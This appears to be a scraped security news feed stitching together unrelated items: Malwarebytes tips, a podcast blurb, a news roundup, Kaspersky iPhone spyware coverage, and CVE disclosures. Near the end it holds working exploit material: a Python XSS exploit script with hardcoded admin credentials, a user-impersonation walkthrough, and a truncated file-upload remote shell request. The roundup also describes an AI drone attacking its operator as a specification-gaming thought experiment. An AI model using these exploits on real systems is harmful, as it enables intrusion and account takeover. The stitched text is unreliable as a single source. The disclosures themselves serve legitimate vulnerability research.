Categories: Personal
It’s time to shake off that special feeling, start lying, forget everything you’ve been told about passwords, spin up a million email addresses, and start throwing away computers for fun.



(Read more...)




The post 5 unusual cybersecurity tips that actually work appeared first on Malwarebytes Labs.

So, you’re on top of your software updates, you use a password manager, you’ve enabled two-factor authentication wherever you can, you’ve got BrowserGuard installed, and you’re running Malwarebytes Premium.

If you're doing all of that you're already winning at security. But you want more, because you know that security is a journey and not a destination, and, let’s face it, you’re reading an article about five unusual cybersecurity tips: You’re hooked.

It's time to innovate and get weird. It’s time to shake off that special feeling, start lying, forget everything you’ve been told about passwords, spin up a million email addresses, and start throwing away computers for fun.

It's time for five unusual cybersecurity tips that actually work:

**1\. Lie**

Generally speaking, the fewer pieces of data you hand out, the safer you are. If a site is asking for data you don't want to share, remember: Sometimes it's OK to lie.

If a site wants a phone number and you don't want them to call you, fake it. (00000000000 is surprisingly effective.) If the site won't accept your made up number, don't worry. Lists of fake numbers that look right for your country but don't work are a short Google search away. It works for other data too, even fake credit card numbers—you won't be able to buy anything with one, but neither will anyone who steals it.

**2\. Stop thinking you're special**

Everyone is a star in their own story, so when we unexpectedly get a message from a lonely young Russian lady who's recently moved to our town, a Nigerian Prince promises us riches, "Keanu Reeves" follows us on Instagram, or we stumble upon the crypto-opportunity of a lifetime, our exceptionalism can kick in.

If it happened to somebody else, we'd be sceptical, but when it happens to us...well, we had a feeling our luck was about to turn! Burst that bubble. If something looks too good to be true, it isn't because you're special, it’s because it IS too good to be true. Sorry.

**3\. Forget strong passwords**

For years you've been told to make unreadable passwords with a of mix uppercase letters, lowercase letters, and wacky characters. That is still important, but reusing passwords over and over again is actually _much_ worse than having lots of different, weaker, passwords.

If a thief can steal your password from anywhere, they will try to use it everywhere, and if the same password works everywhere, you've lost everything. Your goal should be to create a new password for each service you use. Focus on simply avoiding really awful passwords, like "password" or "12345", and save the unreadable passwords for things that really matter, like your bank.

**4\. Use endless email addresses**

Look at your inbox for a few minutes and you’ll probably start to wonder “how did _they_ get my email address?” In between the messages from friends and colleagues, and the newsletters you signed up for but never read, there is always a smattering of speculative nonsense from people who have no business using your email address.

One way of getting on top of that problem is to use different email address for each account you sign up for. Apple will do this for you with its Hide My Email feature, and if you use Gmail you can just add a "+" to the name part of your address followed by anything you like, e.g. john.doe+malwarebytes@gmail.com.

Each unique address should only get messages from the site where you used it. If any other sites use it, you know that your data has been leaked, stolen or sold. If that happens, block the email address and consider closing your account on that site.

**5\. Throw your computer away**

If you want to say super-safe, just browse the internet using a computer with no sensitive data on it, and throw it away when you've finished, simple!

OK, it sounds expensive, but you can do it for free with tools like Oracle's VirtualBox. Virtual Machines (VMs) are computers made of software instead of plastic, metal, and silicon, that run on your computer just like any other program. You can run Windows, your web browser of choice, and all your other favourite apps inside a VM, where they are totally isolated from your real computer.

Like trips to Vegas, whatever happens on a VM stays on a VM. And because VMs can be cloned, rolled back, or destroyed with a mouse click, if anything bad happens on yours you can simply trash it and start a new one.

If you've got an unusual cybersecurity tip, we'd love to hear it. Leave it in the comments below.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

5 unusual cybersecurity tips that actually work

Categories: Podcast
This week on Lock and Code, we ask whether AI can lie and whether companies and individuals are placing too much trust into tools like ChatGPT. 



(Read more...)




The post Trusting AI not to lie: The cost of truth: Lock and Code S04E12 appeared first on Malwarebytes Labs.

In May, a lawyer who was defending their client in a lawsuit against Columbia's biggest airline, Avianca, submitted a legal filing before a court in Manhattan, New York, that listed several previous cases as support for their main argument to continue the lawsuit.

But when the court reviewed the lawyer's citations, it found something curious: Several were entirely fabricated. 

The lawyer in question had gotten the help of another attorney who, in scrounging around for legal precedent to cite, utilized the "services" of ChatGPT. 

ChatGPT was wrong. So why do so many people believe it's always right? 

Today, on the Lock and Code podcast with host David Ruiz, we speak with Malwarebytes security evangelist Mark Stockley and Malwarebytes Labs editor-in-chief Anna Brading to discuss the potential consequences of companies and individuals embracing natural language processing tools—like ChatGPT and Google's Bard—as arbiters of truth. Far from being understood simply as chatbots that can produce remarkable mimicries of human speech and dialogue, these tools are becoming sources of truth for countless individuals, while also gaining attraction amongst companies that see artificial intelligence (AI) and large language models (LLM) as the future, no matter what industry they operate in. 

The future could look eerily similar to an earlier change in translation services, said Stockley, who witnessed the rapid displacement of human workers in favor of basic AI tools. The tools were far, far cheaper, but the quality of the translations—of the truth, Stockley said—was worse. 

> "That is an example of exactly this technology coming in and being treated as the arbiter of truth in the sense that there is a cost to how much truth we want."

Tune in today. 

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use. 

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

Trusting AI not to lie: The cost of truth: Lock and Code S04E12

Plus: Amazon’s Ring was ordered to delete algorithms, North Korea’s failed spy satellite, and a rogue drone “attack” isn’t what it seems.

Code hidden inside PC motherboards left millions of machines vulnerable to malicious updates, researchers revealed this week. Staff at security firm Eclypsium found code within hundreds of models of motherboards created by Taiwanese manufacturer Gigabyte that allowed an updater program to download and run another piece of software. While the system was intended to keep the motherboard updated, the researchers found that the mechanism was implemented insecurely, potentially allowing attackers to hijack the backdoor and install malware.

Elsewhere, Moscow-based cybersecurity firm Kaspersky revealed that its staff had been targeted by newly discovered zero-click malware impacting iPhones. Victims were sent a malicious message, including an attachment, on Apple’s iMessage. The attack automatically started exploiting multiple vulnerabilities to give the attackers access to devices, before the message deleted itself. Kaspersky says it believes the attack impacted more people than just its own staff. On the same day as Kaspersky revealed the iOS attack, Russia’s Federal Security Service, also known as the FSB, claimed thousands of Russians had been targeted by new iOS malware and accused the US National Security Agency (NSA) of conducting the attack. The Russian intelligence agency also claimed Apple had helped the NSA. The FSB did not publish technical details to support its claims, and Apple said it has never inserted a backdoor into its devices.

If that’s not enough encouragement to keep your devices updated, we’ve rounded up all the security patches issued in May. Apple, Google, and Microsoft all released important patches last month—go and make sure you're up to date.

And there’s more. Each week we round up the security stories we didn’t cover in depth ourselves. Click on the headlines to read the full stories. And stay safe out there.

Lina Khan, the chair of the US Federal Trade Commission, warned this week that the agency is seeing criminals using artificial intelligence tools to “turbocharge” fraud and scams. The comments, which were made in New York and first reported by Bloomberg, cited examples of voice-cloning technology where AI was being used to trick people into thinking they were hearing a family member’s voice.

Recent machine-learning advances have made it possible for people’s voices to be imitated with only a few short clips of training data—although experts say AI-generated voice clips can vary widely in quality. In recent months, however, there has been a reported rise in the number of scam attempts apparently involving generated audio clips. Khan said that officials and lawmakers “need to be vigilant early” and that while new laws governing AI are being considered, existing laws still apply to many cases.

In a rare admission of failure, North Korean leaders said that the hermit nation’s attempt to put a spy satellite into orbit didn’t go as planned this week. They also said the country would attempt another launch in the future. On May 31, the Chollima-1 rocket, which was carrying the satellite, launched successfully, but its second stage failed to operate, causing the rocket to plunge into the sea. The launch triggered an emergency evacuation alert in South Korea, but this was later retracted by officials.

The satellite would have been North Korea’s first official spy satellite, which experts say would give it the ability to monitor the Korean Peninsula. The country has previously launched satellites, but experts believe they have not sent images back to North Korea. The failed launch comes at a time of high tensions on the peninsula, as North Korea continues to try to develop high-tech weapons and rockets. In response to the launch, South Korea announced new sanctions against the Kimsuky hacking group, which is linked to North Korea and is said to have stolen secret information linked to space development.

In recent years, Amazon has come under scrutiny for lax controls on people’s data. This week the US Federal Trade Commission, with the support of the Department of Justice, hit the tech giant with two settlements for a litany of failings concerning children’s data and its Ring smart home cameras.

In one instance, officials say, a former Ring employee spied on female customers in 2017—Amazon purchased Ring in 2018—viewing videos of them in their bedrooms and bathrooms. The FTC says Ring had given staff “dangerously overbroad access” to videos and had a “lax attitude toward privacy and security.” In a separate statement, the FTC said Amazon kept recordings of kids using its voice assistant Alexa and did not delete data when parents requested it.

The FTC ordered Amazon to pay around $30 million in response to the two settlements and introduce some new privacy measures. Perhaps more consequentially, the FTC said that Amazon should delete or destroy Ring recordings from before March 2018 as well as any “models or algorithms” that were developed from the data that was improperly collected. The order has to be approved by a judge before it is implemented. Amazon has said it disagrees with the FTC, and it denies “violating the law,” but it added that the “settlements put these matters behind us.”

As companies around the world race to build generative AI systems into their products, the cybersecurity industry is getting in on the action. This week OpenAI, the creator of text- and image-generating systems ChatGPT and Dall-E, opened a new program to work out how AI can best be used by cybersecurity professionals. The project is offering grants to those developing new systems.

OpenAI has proposed a number of potential projects, ranging from using machine learning to detect social engineering efforts and producing threat intelligence to inspecting source code for vulnerabilities and developing honeypots to trap hackers. While recent AI developments have been faster than many experts predicted, AI has been used in the cybersecurity industry for several years—although many claims don’t necessarily live up to the hype.

The US Air Force is moving quickly on testing artificial intelligence in flying machines—in January, it tested a tactical aircraft being flown by AI. However, this week, a new claim started circulating: that during a simulated test, a drone controlled by AI started to “attack” and “killed” a human operator overseeing it, because they were stopping it from accomplishing its objectives.

“The system started realizing that while they did identify the threat, at times the human operator would tell it not to kill that threat, but it got its points by killing that threat,” said Colnel Tucker Hamilton, according to a summary of an event at the Royal Aeronautical Society, in London. Hamilton continued to say that when the system was trained to not kill the operator, it started to target the communications tower the operator was using to communicate with the drone, stopping its messages from being sent.

However, the US Air Force says the simulation never took place. Spokesperson Ann Stefanek said the comments were “taken out of context and were meant to be anecdotal.” Hamilton has also clarified that he “misspoke” and he was talking about a “thought experiment.”

Despite this, the described scenario highlights the unintended ways that automated systems could bend rules imposed on them to achieve the goals they have been set to achieve. Called specification gaming by researchers, other instances have seen a simulated version of _Tetris_ pause the game to avoid losing, and an AI game character killed itself on level one to avoid dying on the next level.

AI Is Being Used to ‘Turbocharge’ Scams

By Waqas
The researchers discovered the oldest traces of infection in 2019, and it is believed that the attack is still active.
This is a post from HackRead.com Read the original post: Kaspersky Reveals iPhones of Employees Infected with Spyware

According to Kaspersky, this is an ongoing investigation, and the perpetrators are yet to be determined.

The CEO of cybersecurity giant and antivirus vendor Kaspersky, Eugene Kaspersky, revealed in a blog post that dozens of iPhones used by their senior employees contained spyware capable of recording audio, capturing images from messaging apps, geolocation, and more.

The company noted that iOS devices on its WiFi network had become targets of threat actors who launched zero-day exploits as part of Operation Triangulation. The researchers discovered the oldest traces of infection in 2019, and it is believed that the attack is still active.

****How Was the Activity Discovered?****

Kaspersky researchers noted suspicious activity on several iPhones while monitoring network traffic for mobile devices on their corporate WiFi network through the KUMA (Kaspersky Unified Monitoring and Analysis) platform.

To investigate further, they created offline backups of these devices since they couldn’t inspect them from the inside and discovered an infection using the Mobile Verification Toolkit’s mvt-ios. This utility provides information about the sequence of events, allowing researchers to recreate the incident.

****Digging Deeper…****

The attack begins with iOS phone users receiving an iMessage with an attachment that contains the exploit. Upon clicking, it triggers a vulnerability that leads to code execution without involving user input, making it a zero-click attack.

The malicious code downloads new payloads after connecting with the C2 server, which can include privilege escalation exploits. The final payload is a feature-rich APT platform.

“The analysis of the final payload is not finished yet. The code is run with root privileges, implements a set of commands for collecting system and user information, and can run arbitrary code downloaded as plugin modules from the C&C server,” the researchers wrote in their blog post.

****Various Vulnerabilities Used to Get Deeper Access****

Multiple vulnerabilities are combined to allow attackers deeper access to the compromised device. Once the final payload is downloaded, the message and the malicious attachments initiate self-deletion. The malware cannot maintain persistence if the device is rebooted, but researchers observed reinfection in some samples.

The exact nature of the bugs used in this attack chain is unclear, but one of the flaws could be the kernel extension vulnerability (CVE-2022-46690) patched by Apple in December 2022.

****Apple’s Response****

Kaspersky’s findings were published the same day the Russian security services released a statement blaming the US for exploiting Apple devices to launch reconnaissance operations.

“Several thousand telephone sets of this brand were infected….. In addition to domestic subscribers, facts of infection of foreign numbers and subscribers using SIM cards registered with diplomatic missions and embassies in Russia, including the countries of the NATO bloc and the post-Soviet space, as well as Israel, SAR, and China, were revealed,” Russian intelligence claimed.

However, Apple’s spokesperson refuted these allegations, stating that none of their products have ever contained a backdoor, and Apple would never collaborate with governments.

Regarding Kaspersky’s report, Apple stated that the issue was detected in some versions of iPhones (iOS version 15.7 and below), whereas currently, iOS devices run version 16.5.

Patrick Wardle, an iOS and macOS security researcher, told Wired that Kaspersky remained hacked by an iOS zero-day exploit for five years, and the issue has been discovered now, indicating that it is pretty challenging to detect zero-day exploits.

Kaspersky noted that this difficulty is caused by iOS’s locked-down design, making it tough to inspect iOS’s activities. This is an ongoing investigation, and the perpetrators are yet to be determined. Stay tuned for an update…

**RELATED ARTICLES**

1.  Israel hacked Kaspersky Labs
2.  Kaspersky spots CIA malware
3.  US: Kaspersky is a national security threat
4.  WikiLeaks’ Vault 8: CIA Impersonated Kaspersky Lab
5.  Kaspersky Reveal How NSA Hacking Tools Were Stolen

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Kaspersky Reveals iPhones of Employees Infected with Spyware

Incorrect Authorization vulnerability in Mobatime web application allows Privilege Escalation, Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Mobatime web application: through 06.7.22.



This walkthrough presents another vulnerability discovered on the Mobatime web application (see CVE-2023-3032, same version 06.7.2022 affected). This vulnerability allows an authenticated user to impersonate another one, possibly having more privileges.

This application is essentially a single page, and the pieces of information are retrieved through AJAX calls. To get adequate pieces of information, the requests carry the user identifier, in order to fetch data related to them. The issue is that this identifier is controlled by the user, and the request body is not protected. It is therefore possible to change this identifier, and impersonate someone else.

A typical AJAX call is as follows:

    POST /Webengine/api/ajax_api.aspx HTTP/1.1 Accept: */*
    Accept-Encoding: gzip, deflate, br
    ... snipped ...
    Sec-GPC: 1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
    AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0
    Safari/537.36 X-Requested-With: XMLHttpRequest
    
    @64eyJhcnJheV9pbnQiOltdLCJmdW5jdGlvbiI6NTA3LCJpcGFyYW0xIjoxNTQsImlwYX
    JhbTEwIjowLCJpcGFyYW0xMSI6MCwiaXBhcmFtMTIiOjAsImlwYXJhbTEzIjowLCJpcGF
    yYW0xNCI6MCwiaXBhcmFtMTUiOjAsImlwYXJhbTIiOjg0MTUsImlwYXJhbTMiOjAsImlw
    YXJhbTQiOjAsImlwYXJhbTUiOjAsImlwYXJhbTYiOjAsImlwYXJhbTciOjAsImlwYXJhb
    TgiOjAsImlwYXJhbTkiOjAsImxwYXJhbTEiOjAsInBhcmFtMSI6IiIsInBhcmFtMiI6Ii
    IsInBhcmFtMyI6IiIsInBhcmFtNCI6IiIsInBhcmFtNSI6IiIsInRva2VuIjowfQ==
    

One can recognise here a base64-encoded JSON (prefix eyJ), which gives us, once decoded:

    {
        "array_int":[],
        "function":507,
        "iparam1":154,
        "iparam10":0,
        "iparam11":0,
        "iparam12":0,
        "iparam13":0,
        "iparam14":0,
        "iparam15":0,
        "iparam2":8415,
        "iparam3":0,
        "iparam4":0,
        "iparam5":0,
        "iparam6":0,
        "iparam7":0,
        "iparam8":0,
        "iparam9":0,
        "lparam1":0,
        "param1":"",
        "param2":"","
        param3":"",
        "param4":"",
        "param5":"",
        "token":0
    }
    

Now, let’s assume that our ID is 154, and that we want to impersonate 155. Keen eye may see that the payload is not signed, hence forgeable. Since the application is a singe page, it was likely that this value 154 was carried by a JS variable, and that we could change it in a single place. All subsequent AJAX calls would probably embed the modified ID, and make us act as 155.

**Hunting the identifier**

Analysing the traffic reveals that the AJAX requests originate from a call to the routine Get in the file MobaBridge3.js. One can suppose here that this routine probably deals with the JSON payload so as to authenticated the request:

A breakpoint was therefore put at line 1’316, before the function end. Refreshing the page reveals that the attribute this._param holds the value 154. It comes from the second argument (param). Since the value 154 was already known there, one can step over LaunchThread to get back to the calling routine ($ctor1).

In this routine, a call to Get is indeed performed, and the second argument containing the identifier is referred to as s. The variable s is obtained thanks to a call to JsonConvert.SerializeObject, hence was likely to be built based on the variable function (line 17). The latter is passed as argument (line 13), and to analyse it, one should once again climb up the calling stack.

The caller lies in the class MensualView.cs, where the func variable is initialised (passed as function). It is worth noting that one of the attributes of func is named iparam1, just like the attribute carrying the identifier in the JSON stream. Its value is held by the attribute Workflow.pid. By looking where such variable is set thanks to a regular expression, only two results are returned. One of them lies on the class LoginLinkWorkflow.cs

By putting a breakpoint at line 139 and refreshing the page, the breakpoint is hit. The value of the variable PId could be turn into 155, and letting the execution flow continue normally, and the page would be rendered as if we were 155.

**Conclusion**

Since only the advertised identifier seems to be used to verify the authorisations, a malicious user could trick the application into thinking that they are someone else by changing their ID on the client side. Since the server trusts this ID, they would serve inappropriate content. The server should use server-side variables to store the ID of a user, based on a session identifier. An alternative could make use of signed JWTs to make them inalterable.

*   **2023** 6
*   **2020** 12

**2023**

**CVE-2023-3033**

3 minute read

This walkthrough presents another vulnerability discovered on the Mobatime web application (see CVE-2023-3032, same version 06.7.2022 affected). This vulnera...

**CVE-2023-3032**

less than 1 minute read

Mobatime offers various time-related products, such as check-in solutions. In versions up to 06.7.2022, an arbitrary file upload allowed an authenticated use...

**CVE-2023-3031**

less than 1 minute read

King-Avis is a Prestashop module developed by Webbax. In versions older than 17.3.15, the latter suffers from an authenticated path traversal, leading to loc...

**FuckFastCGI made simpler**

3 minute read

Let’s render unto Caesar the things that are Caesar’s, the exploit FuckFastCGI is not mine and is a brilliant one, bypassing open\_basedir and disable\_functio...

**PHP .user.ini risks**

4 minute read

I have to admit, PHP is not my favourite, but such powerful language sometimes really amazes me. Two days ago, I found a bypass of the directive open\_basedir...

**PHP open\_basedir bypass**

3 minute read

PHP is a really powerful language, and as a wise man once said, with great power comes great responsibilities. There is nothing more frustrating than obtaini...

Back to Top ↑

**2020**

**Self modifying C program - Polymorphic**

17 minute read

A few weeks ago, a good friend of mine asked me if it was possible to create such a program, as it could modify itself. After some thoughts, I answered that ...

Back to Top ↑

CVE-2023-3033: CVE-2023-3033

On the same day, Russia’s FSB intelligence service launched wild claims of NSA and Apple hacking thousands of Russians.

The Moscow-based cybersecurity firm Kaspersky has made headlines for years by exposing sophisticated hacking by Russian and Western state-sponsored cyberspies alike. Now it’s exposing a stealthy new intrusion campaign where Kaspersky itself was a target.

In a report published today, Kaspersky said that at the beginning of the year, it detected targeted attacks against a group of iPhones after analyzing the company’s own corporate network traffic. The campaign, which the researchers call Operation Triangulation and say is “ongoing,” appears to date back to 2019 and utilized multiple vulnerabilities in Apple’s iOS mobile operating system to let attackers take control of victim devices.

Kaspersky says the attack chain utilized “zero-click” exploitation to compromise targets’ devices by simply sending a specially crafted message to victims over Apple’s iMessage service. Victims received the message, which included a malicious attachment, and exploitation would begin whether victims opened the message and inspected the attachment or not. Then the attack would chain together multiple vulnerabilities to give the hackers deeper and deeper access to the target’s device. And the final malware payload would automatically download to the victim’s device before the original malicious message and attachment self-deleted.

Kaspersky’s revelation of the new iOS hacking campaign comes on the same day that Russia’s FSB intelligence service separately announced a claim that the US National Security Agency has hacked thousands of Russians’ phones. Even more remarkably, the FSB claimed that Apple had participated in that broad hacking of iOS devices, willingly providing vulnerabilities to the NSA to exploit in its spying operations.

Apple said in a statement to WIRED, “We have never worked with any government to insert a backdoor into any Apple product and never will.”

When asked about Kaspersky’s report, an Apple spokesperson noted that the findings only appear to pertain to iPhones running iOS version 15.7 and below. The current version of iOS is 16.5.

Kaspersky says that the malware it discovered cannot persist on a device once it is rebooted, but the researchers say they saw evidence of reinfection in some cases. The exact nature of the vulnerabilities used in the exploit chain remains unclear, though Kaspersky says that one of the flaws was likely the kernel extension vulnerability CVE-2022-46690 that Apple patched in December. 

Zero-click vulnerabilities can exist on any platform, but in recent years, attackers and spyware vendors have focused on finding these flaws in Apple’s iOS, often in iMessage, and exploiting them to launch targeted attacks on iPhones. This is partly because services like iMessage present unusually fertile ground within iOS for discovering vulnerabilities, but also because attacks on iOS devices with this approach are often very difficult for victims to detect.

“Kaspersky, arguably one of the best exploit detection companies in the world, was potentially hacked via an iOS zero-day for five years, and it was only discovered now,” says longtime macOS and iOS security researcher Patrick Wardle. “That shows how ridiculously hard it is to detect these exploits and attacks.”

In their report, the Kaspersky researchers point out that one of the reasons for this difficulty is iOS’s locked-down design, which makes it very tough to inspect the operating system’s activity.

“The security of iOS, once breached, makes it really challenging to detect these attacks,” says Wardle, who was formerly an NSA staffer. At the same time, he adds that attackers would need to assume any brazen campaign to target Kaspersky would eventually be discovered. “In my opinion, this would be sloppy for an NSA attack,” he says. “But it shows that either hacking Kaspersky was incredibly valuable for the attacker or that whoever this was likely has other iOS zero days as well. If you only have one exploit, you’re not going to risk your only iOS remote attack to hack Kaspersky.”

The NSA declined WIRED’s request for comment on either the FSB announcement or Kaspersky’s findings.

With the release of iOS 16 in September 2022, Apple introduced a special security setting for the mobile operating system known as Lockdown Mode that intentionally restricts usability and access to features that can be porous within services like iMessage and Apple’s WebKit. It is not known whether Lockdown Mode would have prevented the attacks Kaspersky observed.

The Russian government’s purported discovery of Apple’s collusion with US intelligence “testifies to the close cooperation of the American company Apple with the national intelligence community, in particular the US NSA, and confirms that the declared policy of ensuring the confidentiality of personal data of users of Apple devices is not true,” claims an FSB statement, which adds that it would allow the NSA and “partners in anti-Russian activities” to target “any person of interest to the White House,” as well as US citizens.

The FSB statement wasn’t accompanied by any technical details of the described NSA spy campaign, or any evidence that Apple colluded in it.

Apple has historically resisted pressure to provide a “backdoor” or other vulnerability to US law enforcement or intelligence agencies. That stance was demonstrated most publicly in Apple’s high-profile 2016 showdown with the FBI over the bureau’s demand that Apple assist in the decryption of an iPhone used by San Bernadino mass shooter Syed Rizwan Farook. The standoff only ended when the FBI found its own method of accessing the iPhone’s storage with the help of Australian cybersecurity firm Azimuth.

Despite its announcement coming on the same day as the FSB’s claims, Kaspersky has so far made no claims that the Operation Triangulation hackers who targeted the company were working on behalf of the NSA. Nor has the cybersecurity firm attributed the hacking to the Equation Group, Kaspersky’s name for the state-sponsored hackers it has previously tied to highly sophisticated malware, including Stuxnet and Duqu, tools widely believed to have been created and deployed by the NSA and US allies.

Kaspersky did say in a statement to WIRED that, “Given the sophistication of the cyberespionage campaign and the complexity of analysis of the iOS platform, further research will surely reveal more details on the matter.”

US intelligence agencies and US allies would, of course, have plenty of reason to want to look over Kaspersky’s shoulder. Aside from years of warnings from the US government that Kaspersky has ties to the Russian government, the company’s researchers have long demonstrated their willingness to track and expose hacking campaigns conducted by Western governments that Western cybersecurity firms don’t. In 2015, in fact, Kaspersky revealed that its own network had been breached by hackers who used a variant of the Duqu malware, suggesting a link to the Equation Group—and thus potentially the NSA.

That history, combined with the sophistication of the malware that targeted Kaspersky, suggests that as wild as the FSB’s claims may be, there’s good reason to imagine that Kaspersky’s intruders could have ties to a government. But if you hack one of the world’s most prolific trackers of state-sponsored hackers—even with seamless, tough-to-detect iPhone malware—you can expect, sooner or later, to get caught.

Kaspersky Says New Zero-Day Malware Hit iPhones—Including Its Own

Online Security Guards Hiring System version 1.0 suffers from a cross site scripting vulnerability.

    #Exploit Title: Online Security Guards Hiring System 1.0 – REFLECTED XSS #Google Dork : NA#Date: 23-01-2023#Exploit Author : AFFAN AHMED#Vendor Homepage: https://phpgurukul.com#Software Link: https://phpgurukul.com/projects/Online-Security-Guard-Hiring-System_PHP.zip#Version: 1.0#Tested on: Windows 11 + XAMPP + PYTHON-3.X#CVE : CVE-2023-0527#NOTE: TO RUN THE PROGRAM FIRST SETUP THE CODE WITH XAMPP AND THEN RUN THE BELOW PYTHON CODE TO EXPLOIT IT# Below code check for both the parameter /admin-profile.php and in /search.php#POC-LINK: https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.mdimport requests import re from colorama import Foreprint(Fore.YELLOW + "######################################################################" + Fore.RESET)print(Fore.RED + "# TITLE: Online Security Guards Hiring System v1.0" + Fore.RESET)print(Fore.RED + "# VULNERABILITY-TYPE : CROSS-SITE SCRIPTING (XSS)" + Fore.RESET)print(Fore.RED + "# VENDOR OF THE PRODUCT : PHPGURUKUL" + Fore.RESET)print(Fore.RED + "# AUTHOR : AFFAN AHMED" + Fore.RESET)print(Fore.YELLOW +"######################################################################" + Fore.RESET)print()print(Fore.RED+"NOTE: To RUN THE CODE JUST TYPE : python3 exploit.py"+ Fore.RESET)print()# NAVIGATING TO ADMIN LOGIN PAGEWebsite_url = "http://localhost/osghs/admin/login.php"    # CHANGE THE URL ACCORDING TO YOUR SETUPprint(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)print(Fore.CYAN + "[**] Inserting the Username and Password in the Admin Login Form [**]" + Fore.RESET)print(Fore.RED+"----------------------------------------------------------------------"+Fore.RESET)Admin_login_credentials = {'username': 'admin', 'password': 'Test@123', 'login': ''}headers = {    'Content-Type': 'application/x-www-form-urlencoded',    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36',    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',    'Referer': 'http://localhost/osghs/admin/login.php',    'Accept-Encoding': 'gzip, deflate',    'Accept-Language': 'en-US,en;q=0.9',    'Connection': 'close',    'Cookie': 'PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc',    'Sec-Fetch-Site': 'same-origin',    'Sec-Fetch-Mode': 'navigate',    'Sec-Fetch-User': '?1',    'Sec-Fetch-Dest': 'document'}response = requests.request("POST", Website_url, headers=headers, data = Admin_login_credentials)if response.status_code == 200:    location = re.findall(r'document.location =\'(.*?)\'',response.text)    if location:        print(Fore.GREEN + "> Login Successful into Admin Account"+Fore.RESET)        print(Fore.GREEN + "> Popup:"+ Fore.RESET,location )    else:        print(Fore.GREEN + "> document.location not found"+ Fore.RESET)else:    print(Fore.GREEN + "> Error:", response.status_code + Fore.RESET)print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)print(Fore.CYAN + " [**] Trying XSS-PAYLOAD in Admin-Name Parameter  [**]" + Fore.RESET)# NAVIGATING TO ADMIN PROFILE SECTION  TO UPDATE ADMIN PROFILE # INSTEAD OF /ADMIN-PROFILE.PHP REPLACE WITH /search.php TO FIND XSS IN SEARCH PARAMETERWebsite_url= "http://localhost/osghs/admin/admin-profile.php"   # CHANGE THIS URL ACCORDING TO YOUR PREFERENCE# FOR CHECKING XSS IN ADMIN-PROFILE USE THE BELOW PAYLOAD# FOR CHECKING XSS IN SEARCH.PHP SECTION REPLACE EVERYTHING AND PUT searchdata=<your-xss-payload>&search=""payload = {    "adminname": "TESTAdmin<script>alert(\"From-Admin-Name\")</script>",      # XSS-Payload , CHANGE THIS ACCORDING TO YOUR PREFERENCE    "username": "admin",                                                      # THESE DETAILS ARE RANDOM , CHANGE IT TO YOUR PREFERENCE    "mobilenumber": "8979555558",    "email": "admin@gmail.com",    "submit": "",}# SENDING THE RESPONSE WITH POST REQUESTresponse = requests.post(Website_url, headers=headers, data=payload)print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)# CHECKING THE STATUS CODE 200 AND ALSO FINDING THE SCRIPT TAG WITH THE HELP OF REGEX if response.status_code == 200:    scripts = re.findall(r'<script>alert$.*?$</script>', response.text)    print(Fore.GREEN + "> Response After Executing the Payload at adminname parameter : "+ Fore.RESET)     print(Fore.GREEN+">"+Fore.RESET,scripts)exploit.pyDisplaying exploit.py.

Online Security Guards Hiring System 1.0 Cross Site Scripting

Bumsys Business Management System version 1.0.3-beta suffers from a remote shell upload vulnerability.

Exploit Title: - unilogies/bumsys v1.0.3-beta - Unrestricted File Upload  
Google Dork : NA  
Date: 19-01-2023  
Exploit Author: AFFAN AHMED  
Vendor Homepage: https://github.com/unilogies/bumsys  
Software Link: https://github.com/unilogies/bumsys/archive/refs/tags/v1.0.3-beta.zip  
Version: 1.0.3-beta  
Tested on: Windows 11, XAMPP-8.2.0  
CVE : CVE-2023-0455

================================  
Steps_TO_Reproduce  
================================  
- Navigate to this URL:[https://demo.bumsys.org/settings/shop-list/](https://demo.bumsys.org/settings/shop-list/)  
- Click on action button to edit the Profile  
- Click on select logo button to upload the image  
- Intercept the POST Request  and do the below changes .

================================================================  
Burpsuite-Request  
================================================================  
POST /xhr/?module=settings&page=updateShop HTTP/1.1  
Host: demo.bumsys.org  
Cookie: eid=1; currencySymbol=%EF%B7%BC; keepAlive=1; __0bb0b4aaf0f729565dbdb80308adac3386976ad3=9lqop41ssg3i9trh73enqbi0i7  
Content-Length: 1280  
Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99"  
X-Csrf-Token: 78abb0cc27ab54e87f66e8160dab3ab48261a8b4  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynO0QAD84ekUMuGaA  
Accept: */*  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Platform: "Windows"  
Origin: https://demo.bumsys.org  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://demo.bumsys.org/settings/shop-list/  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close

------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopName"

TEST  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopAddress"

 test   
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopCity"

testcity  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopState"

